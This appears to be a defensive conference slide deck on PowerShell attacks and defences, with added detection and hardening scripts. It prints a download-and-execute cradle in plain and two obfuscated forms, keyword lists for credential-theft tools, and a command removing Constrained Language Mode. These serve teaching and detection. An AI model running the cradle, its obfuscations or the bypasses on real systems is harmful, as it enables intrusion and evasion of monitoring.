PowerShell Security: Defending the Enterprise from the Latest Attack Platform
Sean Metcalf (@Pyrotek3)
s e a n [@] TrimarcSecurity.com
www.ADSecurity.org
TrimarcSecurity.com
ABOUT
Founder of Trimarc, a security company.
Microsoft Certified Master (MCM) Directory Services
Microsoft MVP
Speaker: BSides, Shakacon, Black Hat, DEF CON, DerbyCon
Security Consultant / Security Researcher
Own & Operate ADSecurity.org (Microsoft platform security info)
AGENDA
PowerShell Overview & Capability
PowerShell as an Attack Platform
Real World PowerShell Attack Code
Bypassing PowerShell Security & Mitigation
Defense Summary
Detecting Offensive PowerShell Attack Tools: https://adsecurity.org/?p=2604
Slides: Presentations.ADSecurity.org
“Isn't PowerShell just C# with training wheels?”
PowerShell Overview
• Object-based scripting language leveraging .Net technologies.
• Primarily designed in C#.
• “BASH shell for Windows”
• PowerShell can call .Net directly: [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
• Extensible through imported code modules which add new commands.
• Simplifies data access to standard resources (WMI, XML, registry, event logs, etc).
• PowerShell.exe (CLI) or PowerShell_ISE.exe (ISE GUI).
• 10 years old! (almost)
PowerShell v5 Security Enhancements
• Script block logging
• System-wide transcripts
• Constrained PowerShell enforced when application whitelisting enabled (AppLocker/Device Guard)
• Antimalware Integration (Win 10) http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
Windows Management Framework (WMF) version 5 available for download: https://www.microsoft.com/en-us/download/details.aspx?id=50395
PowerShell Group Policy
PowerShell v5 Security: Script Block Logging
PowerShell v5 Security: System-Wide Transcripts
PowerShell v5: Constrained PowerShell Enforced (Whitelisting)
Windows 10 PS Security: Antimalware Integration
Windows 10: AntiMalware Scan Interface (AMSI)
Bypassing Windows 10 AMSI
• Sometimes, PowerShell code gets through.
• DLL hijacking: http://cn33liz.blogspot.nl/2016/05/bypassing-amsi-using-powershell-5-dll.html
• Use Reflection:
Security Vendors Supporting Win10 AMSI
1. Microsoft Defender: Now
2. AVG: Now (AVG Protection 2016.7496)
3. ESET: Version 10 Beta
4. Avast: “Avast will be implementing AMSI in the near future.” (7/2015)
5. Trend Micro: ??
6. Symantec: ???
7. McAfee: ???
8. Sophos: ??
9. Kaspersky: ??
10. BitDefender: ??
11. F-Secure: ??
12. Avira: ??
13. Panda: ??
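The vendor list says which products hook AMSI; the question on a given host is whether any provider is actually registered, because with none registered PowerShell v5 hands script content to nobody. The script below is an added example (not from the slides or from the author) that enumerates the providers under the registry key Windows uses for AMSI provider registration and checks the Authenticode signature of each provider DLL. The registry paths are the documented ones; the output shape and the signature check are my own.

```powershell
# Added example (not from the slides): list the AMSI providers registered on this Windows 10 host.
# AMSI-aware antimalware registers a COM class under HKLM\SOFTWARE\Microsoft\AMSI\Providers;
# with no subkeys there, nothing receives the script content that PowerShell v5 submits.
function Get-AmsiProvider {
    [CmdletBinding()]
    param()

    $providerRoot = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path $providerRoot)) {
        Write-Warning 'No AMSI provider key present; this OS build predates AMSI or the key was removed.'
        return
    }

    foreach ($key in Get-ChildItem -Path $providerRoot) {
        $clsid    = $key.PSChildName                       # {GUID} of the provider's COM class
        $classKey = "HKLM:\SOFTWARE\Classes\CLSID\$clsid"
        $name = $null; $dll = $null
        if (Test-Path $classKey) {
            $name = (Get-ItemProperty -Path $classKey -ErrorAction SilentlyContinue).'(default)'
            $raw  = (Get-ItemProperty -Path "$classKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
            if ($raw) { $dll = [Environment]::ExpandEnvironmentVariables($raw.Trim('"')) }
        }
        # A provider whose DLL is missing or unsigned deserves a closer look.
        $sig = if ($dll -and (Test-Path -LiteralPath $dll)) {
            (Get-AuthenticodeSignature -FilePath $dll).Status
        } else {
            'DllMissing'
        }

        [pscustomobject]@{
            Clsid     = $clsid
            Name      = $name
            Dll       = $dll
            Signature = $sig
        }
    }
}

# AMSI integration lives in the v5 engine; a PowerShell v2 engine on the same box has none.
"PowerShell engine: $($PSVersionTable.PSVersion)  (AMSI integration requires 5.0+)"
Get-AmsiProvider | Format-Table -AutoSize
```

Run it in the inventory pass for each Windows 10 build: an empty table on a host that is supposed to be running an AMSI-aware product means script scanning is not happening there, whatever the vendor's roadmap says.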
Just Enough Administration (JEA)
PowerShell v5, Windows 10, Windows Server 2016
aka.ms/jea
https://msdn.microsoft.com/powershell/jea/readme
JEA Overview
• Constrained PowerShell remoting session with whitelisted cmdlets with select parameter options.
• Baked into Windows 10/2016, otherwise deploy PSv5.
• Delegating server rights can leverage a “virtual account” (Win8.1 & 2012R2+).
• Gain insight through PS logging/transcription.
• Ideal for server admin delegation & Active Directory tasks.
JEA Configuration
• Prerequisites (domain-joined, PS Remoting, etc).
• Identify tasks & restrict as appropriate.
• Confirm they work with JEA.
• Configure tasks in a Role Capability file (PSRC).
• Register a Session Configuration that exposes Role Capability.
• Follow principle of least privilege.
• Test. You can accidentally expose access so review Role Capability exposure.
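The configuration steps above, carried through for one delegated task (a helpdesk group may restart two named services and nothing else), as an added example that is not from the slides or the author. The module, role, group and endpoint names are placeholders; it must run elevated on a host with PS Remoting enabled, and in production the .psrc and .pssc files would be deployed from source control rather than generated in place.

```powershell
# Added example (not from the slides): a JEA endpoint that exposes exactly one role capability.
# All names below are placeholders; replace $allowedGroup with the real AD group.
$moduleName   = 'JeaHelpdesk'
$roleName     = 'ServiceRestart'
$allowedGroup = 'CONTOSO\Helpdesk'
$endpointName = 'Helpdesk'

# JEA only discovers .psrc files inside a module's RoleCapabilities folder, so create a module shell.
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$moduleName"
$rcPath     = Join-Path $modulePath 'RoleCapabilities'
New-Item -Path $rcPath -ItemType Directory -Force | Out-Null
New-ModuleManifest -Path (Join-Path $modulePath "$moduleName.psd1")

# Role Capability (PSRC): whitelisted cmdlets, and Restart-Service only with -Name from a fixed set.
# Anything not listed here (Invoke-Expression, Add-Type, arbitrary .NET calls) is not visible in the session.
New-PSRoleCapabilityFile -Path (Join-Path $rcPath "$roleName.psrc") -VisibleCmdlets @(
    'Get-Service',
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }
)

# Session Configuration (PSSC): restricted session type, virtual account instead of the caller's
# own token, and a transcript of every connection written to a central directory.
$psscDir = Join-Path $env:ProgramData 'JEA'
$pssc    = Join-Path $psscDir "$endpointName.pssc"
New-Item -Path $psscDir -ItemType Directory -Force | Out-Null
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory (Join-Path $psscDir 'Transcripts') `
    -RoleDefinitions @{ $allowedGroup = @{ RoleCapabilities = $roleName } }

# Validate before registering; a malformed file is rejected here rather than at first connection.
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw "Invalid session configuration: $pssc" }
Register-PSSessionConfiguration -Name $endpointName -Path $pssc -Force | Out-Null

# The "Test" step from the slide: connect as a member of the group and confirm what is exposed.
#   Enter-PSSession -ComputerName localhost -ConfigurationName Helpdesk
#   Get-Command            # expect Get-Service, Restart-Service and the JEA default cmdlets only
#   Restart-Service -Name Spooler     # allowed
#   Restart-Service -Name WinRM       # rejected: not in the ValidateSet
```

The review the slide asks for is the `Get-Command` output from inside the constrained session, not the .psrc file: a cmdlet exposed without a `Parameters` restriction, or a `VisibleFunctions` entry that wraps something powerful, is the usual way a role capability accidentally grants more than intended.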
PowerShell as an Attack Platform
Attackers Have Options
• Custom executables (EXEs)
• Windows command tools
• Remote Desktop
• Sysinternals tools
• Windows Scripting Host
• VBScript
• CScript
• JavaScript
• Batch files
• PowerShell
Quick PowerShell Attack History
• Summer 2010 - DEF CON 18: Dave Kennedy & Josh Kelly “PowerShell OMFG!” https://www.youtube.com/watch?v=JKlVONfD53w
  • Describes many of the PowerShell attack techniques used today (Bypass exec policy, -Enc, & IE).
  • Released PowerDump to dump SAM database via PowerShell.
• 2012 – PowerSploit, a GitHub repo started by Matt Graeber, launched with Invoke-Shellcode.
  • “Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.”
• 2013 - Invoke-Mimikatz released by Joe Bialek which leverages Invoke-ReflectivePEInjection.
Benefits of PowerShell as an Attack Platform
• Run code in memory without touching disk.
• Download & execute code from another system.
• Interface with .Net & Windows APIs.
• Built-in remoting.
• CMD.exe is commonly blocked, though not PowerShell.
• Most organizations are not watching PowerShell activity.
• Many endpoint security products don’t have visibility into PowerShell activity.
Real-world PowerShell attacks

Word Macro -> PowerShell -> Download & Execute Payload

Download Code & Upload Recon Data
http://pastebin.com/7wYupkJL
Download Code & Execute
http://pastebin.com/juC4CkQG
Download JPG file as EXE, then Execute
http://pastebin.com/juC4CkQG
Create “Update_Google” task to execute Shellcode
http://pastebin.com/juC4CkQG
Find Financial & Sensitive Browser Windows
http://pastebin.com/7wYupkJL
Take Screenshots with PowerShell
WMI Backdoor
https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
Jeffrey Snover & Lee Holmes - DerbyCon 2016 Keynote
PowerShell without PowerShell.exe
Run PowerShell from .Net
• PowerShell = System.Management.Automation.dll
• Applications can run PowerShell code
• “PowerShell ps = PowerShell.Create()”
• Ben Ten’s “Not PowerShell” https://github.com/Ben0xA/nps
Custom “PowerShell” C# App
• Create C# application that references the System.Management.Automation.dll assembly.
• Leverage Automation assembly’s functions to execute PowerShell Code.
• Similar to how PowerShell.exe works.
• Unmanaged PowerShell by Lee Christensen https://github.com/leechristensen/UnmanagedPowerShell
  • Foundation for most PowerShell attack tools running outside of powershell.exe.
  • Starts up .NET & performs in-memory loading of a custom C# assembly that executes PowerShell.
  • Executes PowerShell from an unmanaged process.
Metasploit PowerShell Module
Side-Stepping PowerShell Security
PowerShell Attack Platform: PS>Attack
• Description
  • Self contained custom PowerShell console which includes many offensive PowerShell tools.
  • Calls PowerShell through .Net
  • Modules are encrypted (AV evasion) and decrypted to memory
  • Custom Build Tool
• Use
  • Recon, Credential Theft, Privilege Escalation, Data Exfiltration
• Author
  • Jared Haight (@jaredhaight)
https://github.com/jaredhaight/psattack
PS Constrained Language Mode?
PowerShell v5 Security Log Data?
Detecting/Mitigating PS>Attack
And other Applications (EXEs) hosting PowerShell
Detecting/Mitigating PS>Attack
• Discover PowerShell in non-standard processes.
• Get-Process modules like “*Management.Automation*”
Detecting/Mitigating PS>Attack
• Run Windows 10 with AMSI aware AV
PS>Attack, now with more AMSI Bypass!
Detecting/Mitigating PS>Attack
Remove PowerShell v2 from Windows 10
Detecting/Mitigating PS>Attack (Windows 10)
Detecting Custom EXEs Hosting PowerShell
• Event 800: HostApplication not standard Microsoft tool (PowerShell, PowerShell ISE, etc).
• Event 800: Version mismatch between HostVersion & EngineVersion (problematic).
• System.Management.Automation.(ni.)dll hosted in non-standard processes.
• Remember that custom EXEs can natively call .Net & Windows APIs directly without PowerShell.
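The two detection angles on this slide and on the PS>Attack slide above (a non-standard process that has loaded the automation assembly, and event 800 records whose HostApplication or version fields do not look like a standard host), implemented as an added example that is not from the slides or the author. The known-host baseline list is an assumption to tune per environment, and the regexes assume the field layout of the "Windows PowerShell" log's event 800 message text.

```powershell
# Added example (not from the slides): find PowerShell hosted outside powershell.exe.
#  1. Live: processes with System.Management.Automation(.ni).dll loaded that are not known hosts.
#  2. Historical: "Windows PowerShell" log event 800 records whose HostApplication is not a standard
#     Microsoft host, or whose HostVersion and EngineVersion differ.
# $knownHosts is an assumed baseline; add your own management agents after verifying what they are.
$knownHosts = @('powershell', 'powershell_ise', 'wsmprovhost', 'sdiagnhost', 'ServerManager')

function Find-PowerShellHostProcess {
    foreach ($p in Get-Process) {
        try { $mods = $p.Modules } catch { continue }   # protected or cross-bitness processes deny access
        $auto = @($mods | Where-Object { $_.ModuleName -like 'System.Management.Automation*' })
        if ($auto.Count -gt 0 -and $knownHosts -notcontains $p.ProcessName) {
            [pscustomobject]@{
                Pid     = $p.Id
                Process = $p.ProcessName
                Path    = $p.Path
                Module  = $auto[0].ModuleName
            }
        }
    }
}

function Find-NonStandardHostEvent {
    param([int]$MaxEvents = 2000)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 800 } `
                           -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($ev in $events) {
        $msg     = $ev.Message
        $hostApp = if ($msg -match 'HostApplication=([^\r\n]+)') { $Matches[1].Trim() } else { '' }
        $hostVer = if ($msg -match 'HostVersion=([\d\.]+)')      { $Matches[1] } else { '' }
        $engVer  = if ($msg -match 'EngineVersion=([\d\.]+)')    { $Matches[1] } else { '' }
        # HostApplication starts with the executable path; cut at ".exe" so paths with spaces survive.
        $exe = if ($hostApp -match '^(.*?\.exe)') {
            [IO.Path]::GetFileNameWithoutExtension($Matches[1].Trim('"'))
        } else {
            ($hostApp -split '\s+')[0]
        }
        $reason = if ($exe -and $knownHosts -notcontains $exe) { 'non-standard host' }
                  elseif ($hostVer -and $engVer -and $hostVer -ne $engVer) { 'HostVersion/EngineVersion mismatch' }
        if ($reason) {
            [pscustomobject]@{
                Time            = $ev.TimeCreated
                HostApplication = $hostApp
                HostVersion     = $hostVer
                EngineVersion   = $engVer
                Reason          = $reason
            }
        }
    }
}

Find-PowerShellHostProcess | Format-Table -AutoSize
Find-NonStandardHostEvent  | Format-Table -AutoSize
```

The version-mismatch branch is "problematic" in the slide's sense (some legitimate hosts embed an engine of a different version), but it also surfaces the case the later "Remove PowerShell v2" slide is about: a `-Version 2` downgrade logs an EngineVersion of 2.0 under a 5.x HostVersion, and that engine has no script block logging or AMSI integration.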
PowerShell Logging & Attack Detection
PowerShell Module Logging
• PowerShell version 3+
• Enable via Group Policy:
  • Computer Configuration\Policies\Administrative Templates\Windows Components\Windows PowerShell.
• Logging enhanced in PowerShell v4.
• PowerShell v5 has compelling logging features.
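The three policies this slide and the earlier "PowerShell v5 Security Enhancements" slide rely on (module logging, script block logging, system-wide transcripts) are just registry values under the PowerShell policy key, so they can be set and audited locally without a GPO. The script below is an added example that is not from the slides or the author; the value names are the documented policy values, and the transcript share is a placeholder. Run it elevated; in a domain, set the same values through the Group Policy path named on the slide so they cannot be silently undone on one host.

```powershell
# Added example (not from the slides): apply the PowerShell logging policies locally and verify them.
# These are the registry values written by the Group Policy settings under
# Computer Configuration\Policies\Administrative Templates\Windows Components\Windows PowerShell.
$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $path = Join-Path $policyRoot $SubKey
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    New-ItemProperty -Path $path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# Module logging (PS v3+): pipeline execution details (event 4103) for every module.
Set-PolicyValue -SubKey 'ModuleLogging'             -Name 'EnableModuleLogging' -Value 1
Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'

# Script block logging (PS v5): event 4104 in Microsoft-Windows-PowerShell/Operational, recorded at
# execution time after de-obfuscation, so encoded or string-built commands appear in clear text.
Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1

# System-wide transcription (PS v5): one text transcript per session, including hosts other than
# powershell.exe. Point OutputDirectory at a share users can write to but not read or delete from.
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting'    -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value '\\LOGSERVER\PSTranscripts$' -Type 'String'  # placeholder

function Test-PowerShellLoggingPolicy {
    # One row per setting, so the state can be collected and compared across hosts.
    $checks = @(
        @{ SubKey = 'ModuleLogging';      Name = 'EnableModuleLogging' },
        @{ SubKey = 'ScriptBlockLogging'; Name = 'EnableScriptBlockLogging' },
        @{ SubKey = 'Transcription';      Name = 'EnableTranscripting' }
    )
    foreach ($check in $checks) {
        $path = Join-Path $policyRoot $check.SubKey
        $val  = (Get-ItemProperty -Path $path -Name $check.Name -ErrorAction SilentlyContinue).($check.Name)
        [pscustomobject]@{ Setting = $check.Name; Enabled = ($val -eq 1) }
    }
}

Test-PowerShellLoggingPolicy
```

Script block logging is verbose and the Operational log is small by default, so raise its size (for example `wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824`) or forward it off-host; otherwise the events from the interesting session are the first to be overwritten.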
PowerShell Module Logging - All
PowerShell Attack Detection
• Log all PowerShell activity
• Interesting Activity:
  • .Net Web Client download.
  • Invoke-Expression (and derivatives: “iex”).
  • “EncodedCommand” (“-enc”) & “Bypass”
  • BITS activity.
  • Scheduled Task creation/deletion.
  • PowerShell Remoting (WinRM).
• This is a good start…
PowerShell Attack Detection: Interesting Activity
Invoke-Expression (IEX)
PowerShell Attack Detection: Interesting Activity
.Net Web Client download
Detect Invoke-Mimikatz?
Keywords:
• “mimikatz”
• “gentilkiwi”
• “Invoke-Mimikatz”
Detecting Invoke-Mimikatz: Event Log Keywords
• “TOKEN_PRIVILEGES”
• “SE_PRIVILEGE_ENABLED”
• “System.Reflection.AssemblyName”
• “System.Reflection.Emit.AssemblyBuilderAccess”
• “System.Runtime.InteropServices.MarshalAsAttribute”
Offensive PowerShell Detection in PS Logs
• Invoke-TokenManipulation:
  • “TOKEN_IMPERSONATE”
  • “TOKEN_DUPLICATE”
  • “TOKEN_ADJUST_PRIVILEGES”
• Invoke-CredentialInjection:
  • “TOKEN_PRIVILEGES”
  • “GetDelegateForFunctionPointer”
• Invoke-DLLInjection:
  • “System.Reflection.AssemblyName”
  • “System.Reflection.Emit.AssemblyBuilderAccess”
P\/\/3R5h311 06fU5(@Ti0N
PowerShell Obfuscation
PS C:\> Invoke-Obfuscation
Invoke-Obfuscation PowerShell Module
• Written by blue-teamer Daniel Bohannon.
• Highlights gaps in finding offensive PowerShell code.
Daniel Bohannon at DerbyCon 6 (2016)
Standard Command
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
Standard Command - Obfuscated
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
&( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' ))
Standard Command - Obfuscated
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
&("{0}{2}{3}{1}{4}"-f 'In','e','voke-Exp','r','ssion') (&( "{2}{0}{1}"-f'w-Obje','ct','Ne') ( "{0}{1}{2}{3}"-f 'N','et.','Web','Client') ).("{0}{3}{1}{2}{4}"-f'Downl','ad','S','o','tring' ).Invoke(( 'http' + ':'+'/'+'/bi' +'t.ly'+'/L3g1t' ))
Obfuscation Bypasses AV
PowerShell Defenses
PowerShell Security: Constrained PowerShell
• Useful interim PowerShell security measure.
• Enable Constrained Language Mode:
  [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
• Enable via Group Policy:
  • Computer Configuration\Preferences\Windows Settings\Environment
PowerShell Security: Constrained PowerShell
• Can mitigate initial PowerShell attack.
• Not a panacea.
• Considered minor mitigation method on roadmap to whitelisting.
• Bypassing Constrained PowerShell is possible.
• Remove Constrained Language Mode:
  Remove-Item Env:\__PSLockdownPolicy
• Check Language Mode:
  $ExecutionContext.SessionState.LanguageMode
Finding Obfuscated Evil

Most frequent characters in regular versus obfuscated PowerShell scripts:

| Regular | Obfuscated |
|---------|------------|
| e | $ |
| t | { |
| r | } |
| a | + |
| i | " |
| o | = |
| n | [ |
| s | ( |
| l | ; |

http://www.leeholmes.com/blog/2016/10/22/more-detecting-obfuscated-powershell/
Finding Obfuscated Evil
• Deploy PowerShell v5.
• Enable PowerShell script block logging.
• Look for lots of brackets { }
• Look for lots of quotes (single & double) “ ” & ‘ ’
• Look for random function names & many unusual characters not normally in PowerShell scripts.
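The character-frequency comparison in the table above and the "lots of brackets / lots of quotes" checks in this list, as an added example in Python (not code from the deck or from Lee Holmes' post) so the scoring can be run offline over an export of script block log text. The inputs are the deck's standard command and its two obfuscated forms; the `RATIO_THRESHOLD` value and the `rank_script_blocks` helper are my own assumptions.

```python
from typing import Dict, List

# Character classes from the "Finding Obfuscated Evil" table: the letters that
# dominate regular scripts versus the characters that dominate obfuscated ones.
REGULAR_CHARS = set("etraionsl")
OBFUSCATED_CHARS = set('${}+"=[(;')

# Starting point for the obfuscated:regular ratio. This value is an assumption;
# tune it against a baseline built from your own organization's scripts.
RATIO_THRESHOLD = 0.5

# Test fixtures copied from the earlier slides: the standard download cradle,
# then its string-concatenation and -f format-operator obfuscated forms.
STANDARD = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')"
CONCAT_OBFUSCATED = """&( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' ))"""
FORMAT_OBFUSCATED = """&("{0}{2}{3}{1}{4}"-f 'In','e','voke-Exp','r','ssion') (&( "{2}{0}{1}"-f'w-Obje','ct','Ne') ( "{0}{1}{2}{3}"-f 'N','et.','Web','Client') ).("{0}{3}{1}{2}{4}"-f'Downl','ad','S','o','tring' ).Invoke(( 'http' + ':'+'/'+'/bi' +'t.ly'+'/L3g1t' ))"""


def obfuscation_metrics(script: str) -> Dict[str, float]:
    """Count both character classes plus the brackets and quotes the slide
    tells analysts to look for. Letters are counted case-insensitively
    because PowerShell is case-insensitive and obfuscators scramble case."""
    lowered = script.lower()
    regular = sum(1 for c in lowered if c in REGULAR_CHARS)
    obfuscated = sum(1 for c in script if c in OBFUSCATED_CHARS)
    return {
        "regular": regular,
        "obfuscated": obfuscated,
        # A ratio, not a raw count, so short and long script blocks compare fairly.
        "ratio": obfuscated / max(regular, 1),
        "braces": script.count("{") + script.count("}"),
        "quotes": script.count('"') + script.count("'"),
    }


def looks_obfuscated(script: str, threshold: float = RATIO_THRESHOLD) -> bool:
    """True when obfuscation characters reach the threshold relative to letters."""
    return obfuscation_metrics(script)["ratio"] >= threshold


def rank_script_blocks(blocks: Dict[str, str]) -> List[str]:
    """Order logged script blocks most-suspicious first, so an analyst working
    through a large Event ID 4104 export reviews the worst offenders first."""
    return sorted(blocks, key=lambda n: obfuscation_metrics(blocks[n])["ratio"], reverse=True)


if __name__ == "__main__":
    samples = {"standard": STANDARD, "concat": CONCAT_OBFUSCATED, "format": FORMAT_OBFUSCATED}
    for name in rank_script_blocks(samples):
        m = obfuscation_metrics(samples[name])
        print(f"{name:9} ratio={m['ratio']:.2f} braces={m['braces']} "
              f"quotes={m['quotes']} flagged={looks_obfuscated(samples[name])}")
```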
Offensive PowerShell Detection Cheatsheet
• AdjustTokenPrivileges
• IMAGE_NT_OPTIONAL_HDR64_MAGIC
• Management.Automation.RuntimeException
• Microsoft.Win32.UnsafeNativeMethods
• ReadProcessMemory.Invoke
• Runtime.InteropServices
• SE_PRIVILEGE_ENABLED
• System.Security.Cryptography
• System.Reflection.AssemblyName
• System.Runtime.InteropServices
• LSA_UNICODE_STRING
• MiniDumpWriteDump
• PAGE_EXECUTE_READ
• Net.Sockets.SocketFlags
• Reflection.Assembly
• SECURITY_DELEGATION
• CreateDelegate
• TOKEN_ADJUST_PRIVILEGES
• TOKEN_ALL_ACCESS
• TOKEN_ASSIGN_PRIMARY
• TOKEN_DUPLICATE
• TOKEN_ELEVATION
• TOKEN_IMPERSONATE
• TOKEN_INFORMATION_CLASS
• TOKEN_PRIVILEGES
• TOKEN_QUERY
• Metasploit
• Advapi32.dll
• kernel32.dll
• msvcrt.dll
• ntdll.dll
• secur32.dll
• user32.dll
• AmsiUtils
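The keyword approach from the attack-detection slides (the "interesting activity" list, the Invoke-Mimikatz and other module keywords, and the cheatsheet above) as an added Python example, not code from the deck, that triages script block log text offline. The regexes and the cmdlet names chosen for the BITS, scheduled-task and remoting categories are my own mapping (an assumption), and the sample log lines are constructed.

```python
import re
from typing import Dict, List

# Keyword groups from the deck's detection slides: each offensive module is
# recognised by the Win32/.NET strings it must contain, not by its name.
TOOL_RULES: Dict[str, List[str]] = {
    "Invoke-Mimikatz": ["TOKEN_PRIVILEGES", "SE_PRIVILEGE_ENABLED", "System.Reflection.AssemblyName",
                        "System.Reflection.Emit.AssemblyBuilderAccess",
                        "System.Runtime.InteropServices.MarshalAsAttribute"],
    "Invoke-TokenManipulation": ["TOKEN_IMPERSONATE", "TOKEN_DUPLICATE", "TOKEN_ADJUST_PRIVILEGES"],
    "Invoke-CredentialInjection": ["TOKEN_PRIVILEGES", "GetDelegateForFunctionPointer"],
    "Invoke-DLLInjection": ["System.Reflection.AssemblyName", "System.Reflection.Emit.AssemblyBuilderAccess"],
}
# The cheatsheet above, used as generic "offensive PowerShell" indicators.
CHEATSHEET = [
    "AdjustTokenPrivileges", "IMAGE_NT_OPTIONAL_HDR64_MAGIC", "Management.Automation.RuntimeException",
    "Microsoft.Win32.UnsafeNativeMethods", "ReadProcessMemory.Invoke", "Runtime.InteropServices",
    "SE_PRIVILEGE_ENABLED", "System.Security.Cryptography", "System.Reflection.AssemblyName",
    "System.Runtime.InteropServices", "LSA_UNICODE_STRING", "MiniDumpWriteDump", "PAGE_EXECUTE_READ",
    "Net.Sockets.SocketFlags", "Reflection.Assembly", "SECURITY_DELEGATION", "CreateDelegate",
    "TOKEN_ADJUST_PRIVILEGES", "TOKEN_ALL_ACCESS", "TOKEN_ASSIGN_PRIMARY", "TOKEN_DUPLICATE",
    "TOKEN_ELEVATION", "TOKEN_IMPERSONATE", "TOKEN_INFORMATION_CLASS", "TOKEN_PRIVILEGES", "TOKEN_QUERY",
    "Metasploit", "Advapi32.dll", "kernel32.dll", "msvcrt.dll", "ntdll.dll", "secur32.dll", "user32.dll", "AmsiUtils",
]
# "Interesting activity" from the PowerShell Attack Detection slide. The regexes and
# the cmdlet names for the BITS, scheduled-task and remoting categories are my own
# mapping (assumption), not the deck's.
ACTIVITY_PATTERNS = {
    "invoke-expression": r"\bInvoke-Expression\b|\biex\b",
    "webclient-download": r"Net\.WebClient|\.Download(String|File)\b",
    "encoded-command": r"-enc(odedcommand)?\b",
    "bypass": r"\bbypass\b",
    "bits": r"\bStart-BitsTransfer\b|\bbitsadmin\b",
    "scheduled-task": r"\b(Un)?Register-ScheduledTask\b|\bschtasks\b",
    "remoting": r"\b(Enter-PSSession|New-PSSession|Invoke-Command)\b",
}


def triage_script_block(text: str) -> dict:
    """Classify one logged script block (Event ID 4104 text) or command line.
    Matching is case-insensitive because PowerShell is, and the obfuscation
    slides show case being scrambled freely. Plain substring matching still
    misses the concatenation tricks shown earlier; script block logging helps
    because the code Invoke-Expression finally runs is logged as its own event."""
    lowered = text.lower()
    activity = [name for name, pattern in ACTIVITY_PATTERNS.items()
                if re.search(pattern, text, re.IGNORECASE)]
    hits = [kw for kw in CHEATSHEET if kw.lower() in lowered]
    tools = [tool for tool, kws in TOOL_RULES.items() if all(kw.lower() in lowered for kw in kws)]
    return {"activity": activity, "cheatsheet_hits": hits, "tools": tools,
            "suspicious": bool(activity or hits or tools)}


def flag_events(events: Dict[str, str]) -> List[str]:
    """Names of the events that deserve an analyst's attention."""
    return [name for name, text in events.items() if triage_script_block(text)["suspicious"]]


# Constructed log text, not real captures: a benign admin script, a download
# cradle, an encoded launcher, and a fragment carrying the Invoke-Mimikatz
# strings ('...' and '<base64-blob>' are placeholders for omitted content).
SAMPLE_EVENTS = {
    "admin-report": "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\Reports\\svc.csv",
    "downloader": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    "launcher": "powershell.exe -NoP -ExecutionPolicy Bypass -enc <base64-blob>",
    "token-tool": "... TOKEN_PRIVILEGES ... SE_PRIVILEGE_ENABLED ... System.Reflection.AssemblyName ... "
                  "System.Reflection.Emit.AssemblyBuilderAccess ... "
                  "System.Runtime.InteropServices.MarshalAsAttribute ... Advapi32.dll",
}
```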
Securing PowerShell: A Layered Defense
• Update PowerShell to v4 or v5 (where possible) for enhanced logging.
• Forward PowerShell logs to a central logging solution (Splunk, etc.) and alert on suspicious activity.
• Identify PowerShell usage in the organization (metering) and alert when abnormal use is detected.
• Leverage constrained language mode where possible.
• Code sign all PowerShell scripts used for system administration & management (where possible), especially those that run as scheduled tasks.
• Limit admin rights – users should not have admin on their computers!
• Ask your anti-malware/anti-virus/bad code detecting software vendor when they will support AMSI (Win 10).
• Block Microsoft Office macros, especially those that originate from the Internet (Office 2013/2016 GPO).
• AppLocker (application whitelisting) to block executable content from user locations (profile path, home directory, etc.), only allow exes from trusted locations (C:\Program Files, C:\Windows, etc.), as well as better control PowerShell.
Summary
• PowerShell’s capabilities make it an excellent tool for attackers.
• PowerShell.exe is not PowerShell.
• Securing PowerShell is not straightforward.
• Enable PowerShell logging to understand its use in the environment.
• PowerShell v5 should be every organization’s new baseline version.
• Attackers use more than just PowerShell.
• Layer your defenses.
Slides: Presentations.ADSecurity.org
THANK YOU!
• Ben Ten (@ben0xa)
• Carlos Perez (@Carlos_Perez)
• Daniel Bohannon (@danielhbohannon)
• Jared Haight (@jaredhaight)
• Jeffrey Snover (@jsnover)
• Justin Warner (@sixdub)
